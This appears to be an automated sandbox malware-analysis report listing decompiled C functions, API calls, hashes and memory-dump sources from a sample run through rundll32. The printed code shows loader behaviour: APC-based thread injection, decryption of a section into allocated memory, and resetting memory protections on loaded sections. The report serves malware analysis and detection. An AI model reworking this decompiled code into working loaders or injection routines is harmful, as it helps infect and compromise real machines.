Opcode Fuzzy Hash: f93da4b2ee42385066b09961788a51f9f72db5851c4ec2b72e5f6cfc9cc19030
Instruction Fuzzy Hash: BA218132A00605AFE7019F6ACCC4A4EFBBDFB54761FA18129F907D2250D7B9DD808B50

Uniqueness

Uniqueness Score: -1.00%

Function 70331D2D, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E70331D2D(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x703341cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}

0x70331d44
0x70331d4a
0x70331d4e
0x70331d59
0x70331d61
0x70331d6a
0x70331d6e
0x70331d75
0x70331d7c
0x70331d7e
0x70331d84
0x70331d61
0x70331d88

APIs

CreateThread.KERNELBASE ref: 70331D44
QueueUserAPC.KERNELBASE(?,00000000,?), ref: 70331D59
GetLastError.KERNEL32(00000000), ref: 70331D64
TerminateThread.KERNEL32(00000000,00000000), ref: 70331D6E
CloseHandle.KERNEL32(00000000), ref: 70331D75
SetLastError.KERNEL32(00000000), ref: 70331D7E

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: 677ea7039f3878823d1b2fd48233eaddd5afb781113cb95ee766c21ab4053fcd
Instruction ID: a4669a40a1a044d87c6a5700b691abb7f8286e0ba1e8841da0c5d80f4f91e604
Opcode Fuzzy Hash: 677ea7039f3878823d1b2fd48233eaddd5afb781113cb95ee766c21ab4053fcd
Instruction Fuzzy Hash: 57F05833600220BBD3165BA28CCCF9EFB6DEB09A13F218408F60B95170D76988549BA1

Uniqueness

Uniqueness Score: -1.00%

Function 703517D0, Relevance: 8.0, APIs: 1, Strings: 3, Instructions: 1035COMMON

Download Yara Rule

APIs

GetEnvironmentVariableW.KERNEL32(70380260,C:\Windows\system32,0000069D), ref: 70352151

Strings

C:\Windows\system32, xrefs: 70352147
9, xrefs: 70352105
d, xrefs: 70351AA0

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: EnvironmentVariable
String ID: 9$C:\Windows\system32$d
API String ID: 1431749950-346521724
Opcode ID: a3254233b1d4880262031c9aefe63c981c645b75b5638e38577570c1726868de
Instruction ID: 0ec481adb907634a7c41eadea56d88c473eadace68d89d5edc741d97545765c2
Opcode Fuzzy Hash: a3254233b1d4880262031c9aefe63c981c645b75b5638e38577570c1726868de
Instruction Fuzzy Hash: CEA290729153518FC704CF3AC990B19BBE9FB89354F2506EEE48AD73A5D3349908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00C213E1, Relevance: 6.1, APIs: 4, Instructions: 120
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E00C213E1(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				void* _t41;
				char* _t42;
				long _t43;
				void* _t46;
				intOrPtr _t47;
				intOrPtr* _t48;
				char _t50;
				char* _t55;
				long _t56;
				intOrPtr* _t57;
				void* _t60;
				void* _t61;
				void* _t68;
				void* _t72;
				void* _t73;
				void* _t74;
				void* _t78;

				_t72 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t41 = _t72;
					_pop(_t73);
					_t74 = _t41;
					_t42 =  &_v12;
					_v8 = 0;
					_v16 = 0;
					__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78);
					if(_t42 == 0) {
						_t43 = GetLastError();
						_v8 = _t43;
						if(_t43 == 0x2efe) {
							_v8 = 0;
							goto L29;
						}
					} else {
						if(_v12 == 0) {
							L29:
							 *((intOrPtr*)(_t74 + 0x30)) = 0;
						} else {
							_t46 =  *0xc2a144(0, 1,  &_v24); // executed
							if(_t46 != 0) {
								_v8 = 8;
							} else {
								_t47 = E00C25FBC(0x1000);
								_v20 = _t47;
								if(_t47 == 0) {
									_v8 = 8;
								} else {
									goto L8;
									do {
										while(1) {
											L8:
											_t50 = _v12;
											if(_t50 >= 0x1000) {
												_t50 = 0x1000;
											}
											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16);
											if(_t50 == 0) {
												break;
											}
											_t57 = _v24;
											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0);
											_t18 =  &_v12;
											 *_t18 = _v12 - _v16;
											if( *_t18 != 0) {
												continue;
											} else {
											}
											L14:
											if(WaitForSingleObject( *0xc2a2c4, 0) != 0x102) {
												_v8 = 0x102;
											} else {
												_t55 =  &_v12;
												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55);
												if(_t55 != 0) {
													goto L19;
												} else {
													_t56 = GetLastError();
													_v8 = _t56;
													if(_t56 == 0x2f78 && _v12 == 0) {
														_v8 = 0;
														goto L19;
													}
												}
											}
											L22:
											E00C213CC(_v20);
											if(_v8 == 0) {
												_v8 = E00C21675(_v24, _t74);
											}
											goto L25;
										}
										_v8 = GetLastError();
										goto L14;
										L19:
									} while (_v12 != 0);
									goto L22;
								}
								L25:
								_t48 = _v24;
								 *((intOrPtr*)( *_t48 + 8))(_t48);
							}
						}
					}
					return _v8;
				} else {
					_t60 = E00C2142C(__eax); // executed
					if(_t60 != 0) {
						return _t60;
					} else {
						goto L2;
					}
				}
			}

0x00c213e2
0x00c213e8
0x00c213f3
0x00c213f3
0x00c213f5
0x00c21eab
0x00c21eae
0x00c21eb7
0x00c21eba
0x00c21ebd
0x00c21ec5
0x00c21fc3
0x00c21fce
0x00c21fd1
0x00c21fd3
0x00000000
0x00c21fd3
0x00c21ecb
0x00c21ece
0x00c21fd6
0x00c21fd6
0x00c21ed4
0x00c21edb
0x00c21ee3
0x00c21fba
0x00c21ee9
0x00c21eef
0x00c21ef6
0x00c21ef9
0x00c21fa8
0x00c21eff
0x00000000
0x00c21eff
0x00c21eff
0x00c21eff
0x00c21eff
0x00c21f04
0x00c21f06
0x00c21f06
0x00c21f13
0x00c21f1b
0x00000000
0x00000000
0x00c21f1d
0x00c21f2a
0x00c21f30
0x00c21f30
0x00c21f33
0x00000000
0x00000000
0x00c21f35
0x00c21f40
0x00c21f54
0x00c21f8a
0x00c21f56
0x00c21f56
0x00c21f5d
0x00c21f65
0x00000000
0x00c21f67
0x00c21f67
0x00c21f72
0x00c21f75
0x00c21f7c
0x00000000
0x00c21f7c
0x00c21f75
0x00c21f65
0x00c21f8d
0x00c21f90
0x00c21f98
0x00c21fa3
0x00c21fa3
0x00000000
0x00c21f98
0x00c21f3d
0x00000000
0x00c21f7f
0x00c21f7f
0x00000000
0x00c21f88
0x00c21faf
0x00c21faf
0x00c21fb5
0x00c21fb5
0x00c21ee3
0x00c21ece
0x00c21fe0
0x00c213ea
0x00c213ea
0x00c213f1
0x00c213fc
0x00000000
0x00000000
0x00000000
0x00c213f1

APIs

WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00C24AFA,00000000,?), ref: 00C21F47
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00C24AFA,00000000,?,?), ref: 00C21F67

Part of subcall function 00C2142C: wcstombs.NTDLL ref: 00C214EC

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: ErrorLastObjectSingleWaitwcstombs
String ID:
API String ID: 2344289193-0
Opcode ID: 11b8566797b54d0b5f8f9f17c2885f7adb35e21921dbd6a7f32625a1fe901072
Instruction ID: d8a55f3fe8f8745e12da3bd702e8f458bf201e7c2fc75ed6706c0d633932b2f1
Opcode Fuzzy Hash: 11b8566797b54d0b5f8f9f17c2885f7adb35e21921dbd6a7f32625a1fe901072
Instruction Fuzzy Hash: D7414171910229EFDF209FD5EA846AEB7B9FF14341F184069EC22E7950D7309E41DB11

Uniqueness

Uniqueness Score: -1.00%

Function 00C24C9F, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 00C24CF6
SysAllocString.OLEAUT32(00C254F6), ref: 00C24D39
SysFreeString.OLEAUT32(00000000), ref: 00C24D4D
SysFreeString.OLEAUT32(00000000), ref: 00C24D5B

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 697f148ccf69e3d3c962bddd3ddb86172fc36648a6ad393967e63fd65930f224
Instruction ID: e23046bb952081411dfb8af21360ed95b514d739536304a4447d7fc1ae725b01
Opcode Fuzzy Hash: 697f148ccf69e3d3c962bddd3ddb86172fc36648a6ad393967e63fd65930f224
Instruction Fuzzy Hash: 57315E75910109EFCB19DF98E8C48AE7BB9FF48340F20842EF51AA7620D7759A46CF61

Uniqueness

Uniqueness Score: -1.00%

Function 70331B8C, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E70331B8C(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x703341b0;
				_t46 = E70331FE8(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x703341cc;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x70335137; // 0x70335137
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E703319D9(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x703341cc = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}

0x70331b93
0x70331ba3
0x70331baa
0x70331bad
0x70331bc2
0x70331bc9
0x70331bce
0x70331bdf
0x70331be2
0x70331bea
0x70331bed
0x70331ca0
0x70331bf3
0x70331bf3
0x70331bf9
0x70331c68
0x70331bfb
0x70331bfb
0x70331bfe
0x70331c00
0x70331c08
0x70331c0b
0x70331c0e
0x70331c16
0x70331c21
0x70331c22
0x70331c23
0x70331c40
0x70331c4e
0x70331c55
0x70331c58
0x70331c5e
0x70331c63
0x00000000
0x00000000
0x70331c13
0x70331c13
0x70331c65
0x70331c72
0x70331c87
0x70331c74
0x70331c7d
0x70331c82
0x70331c98
0x70331c98
0x70331ca7
0x70331cad

APIs

VirtualAlloc.KERNELBASE(00000000,70331552,00003000,00000004,?,?,70331552,00000001), ref: 70331BE2
memcpy.NTDLL(?,?,70331552,?,?,70331552,00000001), ref: 70331C7D
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,70331552,00000001), ref: 70331C98

Strings

Aug 10 2021, xrefs: 70331C19

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Aug 10 2021
API String ID: 4010158826-2753409178
Opcode ID: 451905ec385ce398c5d708aba65e745da686b9688195fc229d2585902e9a8711
Instruction ID: 1d652a20d97f38e85191f77edc6220ab31ac09c752534619dcf6272846501bc5
Opcode Fuzzy Hash: 451905ec385ce398c5d708aba65e745da686b9688195fc229d2585902e9a8711
Instruction Fuzzy Hash: 04311B72E40219AFDB01CF95CDC1BAEF7B9BB05304F608169E905BB240D775AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 7033149B, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E7033149B(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E703314FE(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x703314a4
0x703314a9
0x703314b7
0x703314bc
0x703314bc
0x703314c2
0x703314c7
0x703314cb
0x703314cf
0x703314cf
0x703314d9
0x703314e2

APIs

GetCurrentThread.KERNEL32 ref: 7033149E
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 703314A9
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 703314BC
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 703314CF

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.735897152.0000000070336000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_70330000_rundll32.jbxd

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: e6dd0dccb89698a9042d5edef055ae6fd0118b99f58b31c95b22422434089a4c
Instruction ID: 422460422a475259bb799afc7ef0edc1baad004249133199d5a17356d691f0db
Opcode Fuzzy Hash: e6dd0dccb89698a9042d5edef055ae6fd0118b99f58b31c95b22422434089a4c
Instruction Fuzzy Hash: F9E065313056106BA215572B4CC4F6FB66CDF81331F128325F522922E0CB589C1145A5

Uniqueness

Uniqueness Score: -1.00%

Function 70372EE0, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(0000069D,C:\Windows\system32,00000000,000008A2), ref: 70373020
VirtualProtectEx.KERNELBASE(000000FF,0000509B,00000040,7038EAFC), ref: 7037307B

Strings

C:\Windows\system32, xrefs: 70373016

Memory Dump Source

Source File: 00000017.00000002.735940660.000000007033F000.00000020.00020000.sdmp, Offset: 7033F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7033f000_rundll32.jbxd

Similarity

API ID: CurrentDirectoryProtectVirtual
String ID: C:\Windows\system32
API String ID: 3548899580-2896066436
Opcode ID: f3ee59ed79204c8ab2fe32b11dfe9f55ab9099aa283d8ba02e405f05fac6b61e
Instruction ID: e13a1fb9724a05f6f11cc1a2bff6412e1c7565327667a0b1c5b79b4101434c22
Opcode Fuzzy Hash: f3ee59ed79204c8ab2fe32b11dfe9f55ab9099aa283d8ba02e405f05fac6b61e
Instruction Fuzzy Hash: ABB19F739213158FC704CF3ACD947A8BBB9FB84314F2291EAD449A76E4E3789544DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C2142C, Relevance: 4.6, APIs: 3, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00C2142C(void* __esi) {
				signed int _v8;
				long _v12;
				char _v16;
				long* _v20;
				long _t36;
				long* _t47;
				intOrPtr* _t62;
				intOrPtr* _t63;
				char* _t64;

				_t36 =  *((intOrPtr*)(__esi + 0x28));
				_t62 = __esi + 0x2c;
				_v16 = 0;
				 *_t62 = 0;
				_v12 = _t36;
				if(_t36 != 0) {
					L12:
					return _v12;
				}
				_v8 = 4;
				__imp__( *((intOrPtr*)(__esi + 0x18)), 0); // executed
				if(_t36 == 0) {
					L11:
					_v12 = GetLastError();
					goto L12;
				}
				_push( &_v16);
				_push( &_v8);
				_push(_t62);
				_t63 = __imp__; // 0x7029fd20
				_push(0);
				_push(0x20000013);
				_push( *((intOrPtr*)(__esi + 0x18)));
				if( *_t63() == 0) {
					goto L11;
				} else {
					_v16 = 0;
					_v8 = 0;
					 *_t63( *((intOrPtr*)(__esi + 0x18)), 0x16, 0, 0,  &_v8,  &_v16);
					_t47 = E00C25FBC(_v8 + 2);
					_v20 = _t47;
					if(_t47 == 0) {
						_v12 = 8;
					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E00C25FBC(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E00C213CC(_v20);
					}
					goto L12;
				}
			}

0x00c21432
0x00c2143b
0x00c2143e
0x00c21441
0x00c21443
0x00c21446
0x00c21527
0x00c2152d
0x00c2152d
0x00c21450
0x00c21457
0x00c2145f
0x00c2151e
0x00c21524
0x00000000
0x00c21524
0x00c21468
0x00c2146c
0x00c2146d
0x00c2146e
0x00c21474
0x00c21475
0x00c2147a
0x00c21481
0x00000000
0x00c21487
0x00c21496
0x00c21499
0x00c2149c
0x00c214a5
0x00c214ac
0x00c214af
0x00c21515
0x00c214b1
0x00c214b4
0x00c214b8
0x00c214b9
0x00c214ba
0x00c214bb
0x00c214bd
0x00c214c4
0x00c21508
0x00c214c6
0x00c214c6
0x00c214cf
0x00c214dd
0x00c214e1
0x00c214f9
0x00c214e3
0x00c214ec
0x00c214f4
0x00c214f4
0x00c214e1
0x00c2150e
0x00c2150e
0x00000000
0x00c214af

APIs

GetLastError.KERNEL32 ref: 00C2151E

Part of subcall function 00C25FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00C22035), ref: 00C25FC8

wcstombs.NTDLL ref: 00C214EC
GetLastError.KERNEL32 ref: 00C21502

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: ErrorLast$AllocateHeapwcstombs
String ID:
API String ID: 2631933831-0
Opcode ID: 803108d70460f53c520ae67e2457e195020a2cd3c616a089572824543c83c128
Instruction ID: d9d0a075a05c499dde740b5adf90e5d83cef56e22766e1a97551921fd1b29687
Opcode Fuzzy Hash: 803108d70460f53c520ae67e2457e195020a2cd3c616a089572824543c83c128
Instruction Fuzzy Hash: 653129B5900219FFDB21DF95DC80EAEB7B8FF68340F1444A9E912E3650DB309A459B20

Uniqueness

Uniqueness Score: -1.00%

Function 00C25335, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00C25335(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00C2249F(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xc2a2d4; // 0x449d5a8
				_t4 = _t24 + 0xc2bd70; // 0x50c9318
				_t5 = _t24 + 0xc2bd18; // 0x4f0053
				_t26 = E00C211B0( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xc2a2d4; // 0x449d5a8
						_t11 = _t32 + 0xc2bd64; // 0x50c930c
						_t48 = _t11;
						_t12 = _t32 + 0xc2bd18; // 0x4f0053
						_t52 = E00C21370(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xc2a2d4; // 0x449d5a8
							_t13 = _t35 + 0xc2bdae; // 0x30314549
							_t37 = E00C2609A(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0xc2a2b4 - 6;
								if( *0xc2a2b4 <= 6) {
									_t42 =  *0xc2a2d4; // 0x449d5a8
									_t15 = _t42 + 0xc2bbba; // 0x52384549
									E00C2609A(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0xc2a2d4; // 0x449d5a8
							_t17 = _t38 + 0xc2bda8; // 0x50c9350
							_t18 = _t38 + 0xc2bd80; // 0x680043
							_t40 = E00C2304F(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0xc2a290, 0, _t52);
						}
					}
					HeapFree( *0xc2a290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00C2243E(_t54);
				}
				return _t45;
			}

0x00c25335
0x00c25345
0x00c25348
0x00c2534f
0x00c25351
0x00c25351
0x00c25354
0x00c25359
0x00c25360
0x00c2536d
0x00c25372
0x00c25376
0x00c25384
0x00c25392
0x00c25396
0x00c25427
0x00c25427
0x00c2539c
0x00c2539c
0x00c253a1
0x00c253a1
0x00c253a8
0x00c253b4
0x00c253b6
0x00c253b8
0x00c253ba
0x00c253c1
0x00c253cc
0x00c253d3
0x00c253d5
0x00c253dc
0x00c253de
0x00c253e5
0x00c253f0
0x00c253f0
0x00c253dc
0x00c253f5
0x00c253fa
0x00c25401
0x00c25411
0x00c2541f
0x00c25421
0x00c25421
0x00c253b8
0x00c25433
0x00c25433
0x00c25435
0x00c2543a
0x00c2543c
0x00c2543c
0x00c25447

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,050C9318,00000000,?,74B5F710,00000000,74B5F730), ref: 00C25384
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,050C9350,?,00000000,30314549,00000014,004F0053,050C930C), ref: 00C25421
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00C25131), ref: 00C25433

Memory Dump Source

Source File: 00000017.00000002.733621809.0000000000C21000.00000020.00020000.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000017.00000002.733593892.0000000000C20000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733678494.0000000000C29000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.733725240.0000000000C2A000.00000004.00020000.sdmp Download File
Associated: 00000017.00000002.733761318.0000000000C2C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_c20000_rundll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: f0964e8c1a6176663a6ef8804885984aa56864c404859c5c6b952f96a13c502f
Instruction ID: 84a9f64b4450ee1b9ad333fa1f2256ba240324ca14a54f35f1d7f9d9a7787fc1
Opcode Fuzzy Hash: f0964e8c1a6176663a6ef8804885984aa56864c404859c5c6b952f96a13c502f
Instruction Fuzzy Hash: B0317031510529FFDB21DBA4ED85FEE77BCEB44700F140095F608A7821D771AE05AB50

Uniqueness

Uniqueness Score: -1.00%

Function 70332042, Relevance: 4.6, APIs: 3, Instructions: 68
memoryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E70332042(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x703341cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x69b25f40,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x69b25f40;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x7c211d88 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x69b25f42;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x69b25f24;
					} else {
						_t54 = _t57 - 0x69b25f04;
					}
					goto L9;
				}
				goto L12;
			}

0x7033204c
0x70332059
0x7033205f
0x7033206b
0x7033207b
0x7033207d
0x70332085
0x7033211a
0x70332121
0x00000000
0x00000000
0x00000000
0x7033208b
0x7033208b
0x7033208b
0x7033208f
0x00000000
0x00000000
0x7033209b
0x7033209f
0x703320c3
0x703320c7
0x703320db
0x703320db
0x703320e1
0x703320f0
0x703320f4
0x703320fc
0x703320fc
0x70332104
0x70332107
0x70332114
0x00000000
0x00000000
0x00000000
0x00000000
0x70332114
0x703320cf
0x703320d3
0x703320d9
0x00000000
0x00000000
0x00000000
0x703320d9
0x703320a7
0x703320ab
0x703320b5
0x703320ad
0x703320ad
0x703320ad
0x00000000
0x703320ab
0x00000000

APIs

VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 7033207B
VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 703320F0
GetLastError.KERNEL32 ref: 703320F6

Memory Dump Source

Source File: 00000017.00000002.735843702.0000000070331000.00000020.00020000.sdmp, Offset: 70330000, based on PE: true

Associated: 00000017.00000002.735830100.0000000070330000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735858122.0000000070333000.00000002.00020000.sdmp Download File
Associated: 00000017.00000002.735877674.0000000070335000.00000004.00020000.sdmp Download File
